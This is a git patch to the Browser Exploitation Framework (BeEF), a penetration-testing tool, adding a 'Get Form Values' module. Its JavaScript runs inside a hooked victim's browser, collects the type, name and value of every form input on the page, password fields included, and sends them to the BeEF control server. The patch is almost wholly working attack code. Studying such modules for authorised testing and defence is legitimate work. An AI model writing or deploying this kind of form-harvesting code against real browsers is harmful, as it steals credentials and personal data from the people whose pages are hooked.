From 5252bea54ace2ce0ef1b9f15980aaeb90253530f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 2 Jun 2013 05:11:45 +0930
Subject: [PATCH] Add Get Form Values module

This module retrieves the name, type, and value of all input
fields for all forms on the page.
---
 .../hooked_domain/get_form_values/command.js  | 28 +++++++++++++++++++
 .../hooked_domain/get_form_values/config.yaml | 15 ++++++++++
 .../hooked_domain/get_form_values/module.rb   | 14 ++++++++++
 3 files changed, 57 insertions(+)
 create mode 100644 modules/browser/hooked_domain/get_form_values/command.js
 create mode 100644 modules/browser/hooked_domain/get_form_values/config.yaml
 create mode 100644 modules/browser/hooked_domain/get_form_values/module.rb

diff --git a/modules/browser/hooked_domain/get_form_values/command.js b/modules/browser/hooked_domain/get_form_values/command.js
new file mode 100644
index 000000000..05cc73971
--- /dev/null
+++ b/modules/browser/hooked_domain/get_form_values/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var form_data = new Array();
+
+	// loop through all forms
+	for (var f=0; f < document.forms.length; f++) {
+		// store type,name,value for all input fields
+		for (var i=0; i < document.forms[f].elements.length; i++) {
+			form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
+		}
+	}
+
+	// return form data
+	if (form_data.length) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
+	// return if no input fields were found
+	} else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
+	}
+
+});
+
diff --git a/modules/browser/hooked_domain/get_form_values/config.yaml b/modules/browser/hooked_domain/get_form_values/config.yaml
new file mode 100644
index 000000000..819416099
--- /dev/null
+++ b/modules/browser/hooked_domain/get_form_values/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_form_values:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Form Values"
+            description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/browser/hooked_domain/get_form_values/module.rb b/modules/browser/hooked_domain/get_form_values/module.rb
new file mode 100644
index 000000000..adc924fc2
--- /dev/null
+++ b/modules/browser/hooked_domain/get_form_values/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_form_values < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['form_data'] = @datastore['form_data']
+		save content
+	end
+
+end